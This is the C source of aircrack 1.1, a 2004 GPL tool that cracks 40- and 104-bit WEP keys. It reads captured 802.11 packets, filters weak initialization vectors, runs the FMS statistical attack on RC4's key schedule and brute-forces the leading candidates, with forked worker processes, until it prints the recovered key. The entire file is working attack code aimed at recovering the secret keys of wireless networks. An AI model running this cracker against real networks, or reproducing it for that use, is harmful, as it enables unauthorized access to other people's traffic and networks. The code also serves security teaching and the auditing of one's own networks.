/*
 *  802.11 40/104 bit WEP Key Cracker
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  Partly based on David Hulton's dwepcrack
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <time.h>
#include <math.h>

#include "pcap.h"

#define AMOD(x,y) ((x) % (y) < 0 ? ((x) % (y)) + (y) : (x) % (y))
#define SWAP(x,y) { unsigned char tmp = x; x = y; y = tmp; }

#define SUCCESS 0
#define FAILURE 1

char usage[] =

"\n"
"  aircrack 1.1 - (C) 2004 Christophe Devine\n"
"\n"
"  usage: %s [options] <pcap filename(s)>\n"
"\n"
"      -b <bssid> : identifier of the network to crack\n"
"      -d <start> : debug - specify beginning of the key\n"
"      -f <fudge> : bruteforce fudge factor (default: 4)\n"
"      -k <keyid> : WEP KeyID to crack (0-3, default: 0)\n"
"      -n <nbits> : WEP key length (40/104, default: 40)\n"
"      -p <nfork> : SMP support: # of processes to start\n"
"\n";

/* command-line parameters */

int bssid_set = 0;              /* check flag   */
int debug_lvl = 0;              /* debug level  */
unsigned char bssid[6];         /* AP's BSSID   */
unsigned char debug[13];        /* partial key  */
int keyid  = 0;                 /* WEP KeyID    */
int weplen = 5;                 /* WEP key len. */
int ffact  = 4;                 /* fudge factor */
int nfork  = 1;                 /* nb. of forks */

/* runtime global data */

unsigned char buffer[65536];    /* buffer for reading packets   */
unsigned char kcheck[8][10];    /* 8 packets to verify wepkey   */
unsigned char wepkey[13];       /* the current chosen WEP key   */
unsigned char *ivbuf[13];       /* potentially weak chosen ivs  */
unsigned long nb_ivs[13];       /* number of elements in ivbuf  */
unsigned long nb_enc_pkt;       /* number of encrypted packets  */
time_t tm_start, tm_prev;       /* for displaying elapsed time  */
char *test_unique_ivs;          /* to avoid adding duplicates   */

int tried;                      /* total # of keys tried so far */
int weaks[13];                  /* nb of weak ivs for each byte */
int fudge[13];                  /* bruteforce level (1 to 256)  */
int depth[13];                  /* how deep we are in the fudge */
int stats_flag;                 /* SMP mode - show_stats bool.  */

struct byte_stat
{
    int index;
    int votes;
}
wpoll[13][256];                 /* FMS attack: statistical data */

int read_ivs( char *filename, int *nb_chk );
int do_wep_crack( int B );

int main( int argc, char *argv[] )
{
    char *s;
    int i, n, nb_chk;

    /* check the arguments */

    if( argc < 2 )
    {
    usage:
        printf( usage, argv[0] );
        return( FAILURE );
    }

    while( 1 )
    {
        int option = getopt( argc, argv, "b:d:f:k:n:p:" );

        if( option < 0 ) break;

        switch( option )
        {
            case 'b':

                i = 0;
                s = optarg;

                while( sscanf( s, "%x", &n ) == 1 )
                {
                    if( n < 0 || n > 255 )
                        goto usage;

                    bssid[i] = n;

                    if( ++i == 6 ) break;

                    if( ! ( s = strchr( s, ':' ) ) )
                        break;

                    s++;
                }

                if( i != 6 ) goto usage;
                bssid_set = 1;
                break;

            case 'd' :

                i = 0;
                s = optarg;

                while( sscanf( s, "%x", &n ) == 1 )
                {
                    if( n < 0 || n > 255 )
                        goto usage;

                    debug[i] = n;

                    if( ++i == 13 ) break;

                    if( ! ( s = strchr( s, ':' ) ) )
                        break;

                    s++;
                }

                if( i == 0 ) goto usage;
                debug_lvl = i;
                break;

            case 'f' :

                if( sscanf( optarg, "%d", &ffact ) != 1 )
                    goto usage;

                if( ffact < 1 )
                    goto usage;

                break;

            case 'k' :

                if( sscanf( optarg, "%d", &keyid ) != 1 )
                    goto usage;

                if( keyid < 0 || keyid > 3 )
                    goto usage;

                break;

            case 'n' :

                if( sscanf( optarg, "%d", &weplen ) != 1 )
                    goto usage;

                if( weplen != 40 && weplen != 104 )
                    goto usage;

                weplen /= 8;

                break;

            case 'p' :

                if( sscanf( optarg, "%d", &nfork ) != 1 )
                    goto usage;

                if( nfork < 1 || nfork > 256 )
                    goto usage;

                break;

            default : goto usage;
        }
    }

    if( ! ( argc - optind ) )
        goto usage;

    /* initialize all the data */

    nb_chk = 0;

    for( i = 0; i < 13; i++ )
    {
        if( ! ( ivbuf[i] = (unsigned char *)
                            malloc( 0x400000 ) ) )
        {
            perror( "malloc" );
            return( FAILURE );
        }

        nb_ivs[i] = 0;
    }

    nb_enc_pkt = 0;

    if( ! ( test_unique_ivs = (char *)
                                malloc( 256 * 256 * 256 ) ) )
    {
        perror( "malloc" );
        return( FAILURE );
    }

    memset( test_unique_ivs, 0, 256 * 256 * 256 );

    /* read the packets from each file */

    while( optind != argc )
    {
        if( read_ivs( argv[optind], &nb_chk ) != SUCCESS )
            return( FAILURE );

        optind++;
    }

    free( test_unique_ivs );

    if( nb_chk < 8 )
    {
        fprintf( stderr, "Could not get enought check packets!\n" );
        return( FAILURE );
    }

    /* launch the attack */

    tm_start = tm_prev = time( NULL );

    printf( "\33[2J\33[2;1H" );
    fflush( stdout );

    stats_flag = 1;

    if( do_wep_crack( 0 ) != SUCCESS )
    {
        printf( "   No luck, sorry.\n\n" );
        return( FAILURE );
    }

    printf( "\n" );

    return( SUCCESS );
}

int read_ivs( char *filename, int *nb_chk )
{
    int i, n, infile;
    unsigned long cnt1;
    unsigned long cnt2;
    unsigned char *h80211;
    struct pcap_pkthdr pkh;
    struct pcap_file_header pfh;

    /* open the file and check the pcap header */

    printf( "Opening pcap file %s\n", filename );

    if( ( infile = open( filename, O_RDONLY | O_LARGEFILE ) ) < 0 )
    {
        perror( "open" );
        return( FAILURE );
    }

    n = sizeof( struct pcap_file_header );

    if( read( infile, &pfh, n ) != n )
    {
        perror( "read" );
        return( FAILURE );
    }

    if( pfh.magic != TCPDUMP_MAGIC )
    {
        fprintf( stderr, "wrong magic from pcap file header\n"
                         "(got 0x%08X, expected 0x%08X)\n",
                         pfh.magic, TCPDUMP_MAGIC );
        return( FAILURE );
    }

    if( pfh.linktype != LINKTYPE_IEEE802_11 &&
        pfh.linktype != LINKTYPE_PRISM_HEADER )
    {
        fprintf( stderr, "unsupported pcap header linktype %d\n",
                 pfh.linktype );
        return( FAILURE );
    }

    tm_prev = time( NULL );

    cnt1 = cnt2 = 0;

    while( 1 )
    {
        int x, y, z, a, b, B = 0;

        /* every 1s, update the display */

        if( time( NULL ) - tm_prev >= 1 )
        {
            tm_prev = time( NULL );
            printf( "\r\33[2KReading packets: total = %ld"
                    ", usable = %ld\r", cnt1, cnt2 );
            fflush( stdout );
        }

        /* read one packet */

        n = sizeof( pkh );

        if( read( infile, &pkh, n ) != n )
            break;

        n = pkh.len;

        if( read( infile, buffer, n ) != n )
            break;

        cnt1++;

        h80211 = buffer;

        if( pfh.linktype == LINKTYPE_PRISM_HEADER )
        {
            /* remove the prism header if necessary */

            n = *(int *)( h80211 + 4 );
            h80211 += n; pkh.len -= n;

            if( pkh.len <= 0 )
            {
                fprintf( stderr, "\nFIXME: wrong prism header size ?\n" );
                continue;
            }
        }

        /* minimum encrypted data packet size: 40 = 24  *
         * (802.11) + 4 (IV, KeyID) + 8 (LLC) + 4 (FCS) */

        if( pkh.len < 40 ) continue;

        /* is it an encrypted data packet ? */

        if( ( h80211[0] & 0x0C ) != 0x08 ) continue;
        if( ( h80211[1] & 0x40 ) != 0x40 ) continue;

        /* is it the correct keyid ? */

        if( ( h80211[27] >> 6 ) != keyid ) continue;

        /* check if the bssids match */

        switch( h80211[1] & 3 )
        {
            case  0: i = 16; break;      /* DA, SA, BSSID  */
            case  1: i =  4; break;      /* BSSID, SA, DA  */
            case  2: i = 10; break;      /* DA, BSSID, SA  */
            default: i =  4; break;      /* RA, TA, DA, SA */
        }

        if( ! bssid_set )
        {
            memcpy( bssid, h80211 + i, 6 );

            printf( "\33[2KChoosing first encrypted BSSID"
                    " = %02X:%02X:%02X:%02X:%02X:%02X\n",
                    bssid[0], bssid[1], bssid[2],
                    bssid[3], bssid[4], bssid[5] );

            bssid_set = 1;
        }
        else
            if( memcmp( bssid, h80211 + i, 6 ) )
                continue;

        /* have we already seen this IV ? */

        n = ( h80211[24] << 16 )
          | ( h80211[25] <<  8 )
          | ( h80211[26]       );

        if( test_unique_ivs[n] ) continue;

        test_unique_ivs[n] = 1;

        cnt2++; nb_enc_pkt++;

        if( *nb_chk < 8 )
        {
            /* this packet's first bytes will be used to check *
             * if the current chosen WEP key is the valid one  */

            memcpy( kcheck[*nb_chk], h80211 + 24, 10 );

            kcheck[*nb_chk][4] ^= 0xAA;
            kcheck[*nb_chk][5] ^= 0xAA;
            kcheck[*nb_chk][6] ^= 0x03;
/*
            kcheck[*nb_chk][7] ^= 0x00;
            kcheck[*nb_chk][8] ^= 0x00;
            kcheck[*nb_chk][9] ^= 0x00;
*/
            (*nb_chk)++;
        }

        /* now filter the IV using David Hulton's algorithm,  *
         * to reduce the total number of potentially weak IVs */

        x = h80211[24];
        y = h80211[25];
        z = h80211[26];

        a = ( x + y ) & 0xFF;
        b = AMOD( (x + y) - z, 256 );

        for( B = 0; B < 13; B++ )
        {
            /* I don't understand this, either - *
             * but it appears to work just fine. */

            if((((0 <= a && a < B) ||
             (a == B && b == (B + 1) * 2)) &&
             (B % 2 ? a != (B + 1) / 2 : 1)) ||
             (a == B + 1 && (B == 0 ? b == (B + 1) * 2 : 1)) ||
             (x == B + 3 && y == 255) ||
             (B != 0 && !(B % 2) ? (x == 1 && y == (B / 2) + 1) ||
             (x == (B / 2) + 2 && y == 255 - x) : 0))
            {
                /* could be a weak IV for keybyte B, so add it */

                ivbuf[B][(nb_ivs[B] << 2)    ] = h80211[24];
                ivbuf[B][(nb_ivs[B] << 2) + 1] = h80211[25];
                ivbuf[B][(nb_ivs[B] << 2) + 2] = h80211[26];

                /* also add the first byte of RC4's output - the *
                 * plaintext always starts by AA AA 03 00 00 00  */

                ivbuf[B][(nb_ivs[B] << 2) + 3] = h80211[28] ^ 0xAA;

                nb_ivs[B]++;
            }
        }
    }

    printf( "\r\33[2KReading packets: total = %ld"
            ", usable = %ld.\n", cnt1, cnt2 );

    return( SUCCESS );
}

/* this routine sets up the key schedule using wepkey and *
 * each 8 packets IV, then checks if RC4's output matches */

int check_wepkey( void )
{
    unsigned char S[256], K[16];
    int ntest, i, j, d, dmask;

    dmask = 3 + weplen - 1;

    memcpy( K + 3, wepkey, weplen );

    for( ntest = 0; ntest < 8; ntest++ )
    {
        for( i = 0; i < 256; i++ )
            S[i] = i;

        memcpy( K, kcheck[ntest], 3 );

        for( i = j = d = 0; i < 256; i++ )
        {
            j = ( j + S[i] + K[d]) & 0xFF;
            SWAP( S[i], S[j] );
            d++; d &= dmask;
        }

        for( i = 1, j = 0; i < 7; i++ )
        {
            j = ( j + S[i] ) & 0xFF;
            SWAP(S[i], S[j]);

            if( S[(S[i] + S[j]) & 0xFF] !=
                kcheck[ntest][3 + i] )
                return( FAILURE );
        }
    }

    return( SUCCESS );
}

/* this routine displays a bunch of statistical   *
 * data about the current state of the FMS attack */

void show_stats( void )
{
    time_t delta;
    struct winsize ws;
    int i, et_h, et_m, et_s;

    tm_prev = time( NULL );
    delta = tm_prev - tm_start;

    if( ioctl( 0, TIOCGWINSZ, &ws ) < 0 )
    {
        ws.ws_row = 25;
        ws.ws_col = 80;
    }

    if( ! delta ) delta++;

    et_h =   delta / 3600;
    et_m = ( delta - et_h * 3600 ) / 60;
    et_s =   delta - et_h * 3600 - et_m * 60;

    printf( "\33[2;%dH\33[1maircrack 1.1\33[0m\n\n",
            ( ws.ws_col - 12 ) / 2 ); 

    printf( "   * Got %8ld unique IVs | fudge factor = %d\n",
            nb_enc_pkt, ffact );

    printf( "   * Elapsed time [%02d:%02d:%02d] | "
            "\33[Ktried %d keys at %ld k/s\n",
            et_h, et_m, et_s, tried, tried / delta );

    if( nfork > 1 )
        printf( "   * Current process = %2d (switch with Enter)\n",
                getpid() - getppid() );

    printf( "\n   KB  weaks   depth   votes\n" );

    for( i = 0; i < weplen; i++ )
    {
        int j, k = ( ws.ws_col - 24 ) / 8;

        printf( "   %2d %5d%c %3d/%3d   ",
                i, weaks[i], ( weaks[i] < 60 ) ?
                '!' : ' ', depth[i], fudge[i] );

        for( j = depth[i]; j < k + depth[i]; j++ )
        {
            if( j >= 256 ) break;

            printf( "%02X(%3d) ", wpoll[i][j].index,
                                  wpoll[i][j].votes );
        }

        printf( "\n" );
    }

    printf( "\n" );

    fflush( stdout );
}

/* routine used to sort the votes */

int cmp_votes( const void *bs1, const void *bs2 )
{
    if( ((struct byte_stat *) bs1)->votes <
        ((struct byte_stat *) bs2)->votes )
        return(  1 );

    if( ((struct byte_stat *) bs1)->votes >
        ((struct byte_stat *) bs2)->votes )
        return( -1 );

    return( SUCCESS );
}

/* routine that handles signals */

void my_sighandler( int signum )
{
    switch( signum )
    {
        case SIGTERM: exit( FAILURE ); break;
        case SIGUSR1: stats_flag =  0; break;
        case SIGUSR2: stats_flag =  1; break;
        default: break;
    }
}

/* this routine splits byte B's fudge among our children */

int do_multiplex( int B )
{
    fd_set rfds;
    int i, st_index;
    int j, nb_child;
    int pid, status;
    int pidlist[256];
    struct timeval tv;

    depth[B] = 0;
    st_index = 0;
    nb_child = 0;

    signal( SIGTERM, SIG_IGN );
    signal( SIGUSR1, SIG_IGN );
    signal( SIGUSR2, SIG_IGN );

    while( 1 )
    {
        if( depth[B] == fudge[B] && nb_child == 0 )
        {
            /* there's no children left and  *
             * none must be started, so exit */

            break;
        }

        if( depth[B] < fudge[B] && nb_child < nfork )
        {
            /* fork again, deeper into the fudge */

            while( ( pid = fork() ) < 0 )
                sleep( 1 );

            if( ! pid )
            {
                signal( SIGTERM, my_sighandler );
                signal( SIGUSR1, my_sighandler );
                signal( SIGUSR2, my_sighandler );
                wepkey[B] = wpoll[B][depth[B]].index;
                exit( do_wep_crack( B + 1 ) );
            }

            pidlist[nb_child++] = pid;

            stats_flag = 0;

            depth[B]++;
        }
        else
        {
            /* maximum depth or number of children reached */

            while( 1 )
            {
                if( ( pid = waitpid( -1, &status, WNOHANG ) ) )
                    break;

                tv.tv_sec  = 0;
                tv.tv_usec = 100000;

                FD_ZERO( &rfds );
                FD_SET( 0, &rfds );

                if( select( 1, &rfds, NULL, NULL, &tv ) < 0 )
                {
                    if( errno == EAGAIN )
                        continue;

                    perror( "select" );
                    kill( 0, SIGTERM );
                    return( FAILURE );
                }

                /* user pressed Enter, so tell our children *
                 * that the next one must display the stats */

                if( FD_ISSET( 0, &rfds ) )
                {
                    read( 0, buffer, 32 );

                    st_index = ( st_index + 1 ) % nb_child;

                    pid = pidlist[st_index];

                    kill(   0, SIGUSR1 );
                    kill( pid, SIGUSR2 );
                }
            }

            nb_child--;

            /* do we have a winner ? */

            if( WIFEXITED(status) && WEXITSTATUS(status) == SUCCESS )
            {
                kill( 0, SIGTERM );
                return( SUCCESS );
            }

            /* nope, make room at the end of pidlist */

            if( nb_child == 0 ) continue;

            for( i = j = 0; i <= nb_child; i++ )
            {
                pidlist[j] = pidlist[i];
                j += ( pidlist[i] != pid );
            }

            st_index = st_index % nb_child;

            pid = pidlist[st_index];

            kill(   0, SIGUSR1 );
            kill( pid, SIGUSR2 );
        }
    }

    return( FAILURE );
}

/* this recursive routine performs the FMS attack itself */

int do_wep_crack( int B )
{
    unsigned char R[256];
    unsigned char S[256];
    unsigned char K[16];
    unsigned char X, E;
    unsigned long n;
    int i, j;

    weaks[B] = 0;

    for( i = 0; i < 256; i++ )
    {
        wpoll[B][i].index = i;
        wpoll[B][i].votes = 0;
        R[i] = i;
    }

    if( B ) memcpy( K + 3, wepkey, B );

    /* loop through our collection of potentially weak IVs */

    for( n = 0; n < 4 * nb_ivs[B]; n += 4 )
    {
        memcpy( K, &ivbuf[B][n], 3 );
        memcpy( S, R, 256 );

        /* reproduce the first 3 + B steps of the KSA */

        for( i = j = 0; i < 3 + B; i++ )
        {
            j = ( j + S[i] + K[i]) & 0xFF;
            SWAP( S[i], S[j] );
        }

        if( S[1] < 3 + B && ( ( S[1] + S[S[1]] ) & 0xFF ) == 3 + B )
        {
            /* this IV is weak for the current wepkey  *
             * so reverse the byte E and cast the vote */

            weaks[B]++;

            X = ivbuf[B][n + 3];

            for( i = 0; i < 256; i++ )
                if( S[i] == X )
                    break;

            /* E could be the Bth keybyte */

            E = ( i - j - S[3 + B] ) & 0xFF;

            wpoll[B][E].votes += 1 + (S[S[1]] == 1);
        }
    }

    if( B < debug_lvl )
    {
        fudge[B] = 1;
        wpoll[B][debug[B]].votes = 99;
    }

    /* sort the votes, highest ones first */

    qsort( wpoll[B], 256, sizeof( struct byte_stat ), cmp_votes );

    /* see how far we should go based on the number of weaks ivs */

    if( B >= debug_lvl )
    {
        fudge[B] = ( 16 * ffact / expf(
            0.03 * (float) ( weaks[B] - 12 * ffact ) ) );

        if( fudge[B] <=  0 ) fudge[B] =   1;
        if( fudge[B] > 256 ) fudge[B] = 256;
    }

    /* try the most likely n votes, where n is our current fudge */ 

    if( B == debug_lvl && nfork > 1 )
        return( do_multiplex( B ) );

    for( depth[B] = 0; depth[B] < fudge[B]; depth[B]++ )
    {
        wepkey[B] = wpoll[B][depth[B]].index;

        if( B < weplen - 1 )
        {
            /* this keybyte has been set, attack the next one */

            if( ! do_wep_crack( B + 1 ) )
                return( SUCCESS );
        }
        else
        {
            /* last keybyte reached, so check if wepkey is valid */

            tried++;

            /* every second, display some stats */

            if( time( NULL ) - tm_prev >= 1 && stats_flag )
                show_stats();

            if( ! check_wepkey() )
            {
                /* we have a valid key */

                show_stats();

                printf( "\33[%dC\33[31;1mKEY FOUND! [",
                        28 - weplen );

                for( i = 0; i < weplen; i++ )
                    printf( "%02X%c", wepkey[i],
                            ( i + 1 < weplen ) ? ':' : ']' );

                printf( "\33[0m\n" );

                return( SUCCESS );
            }
        }
    }

    return( FAILURE );
}
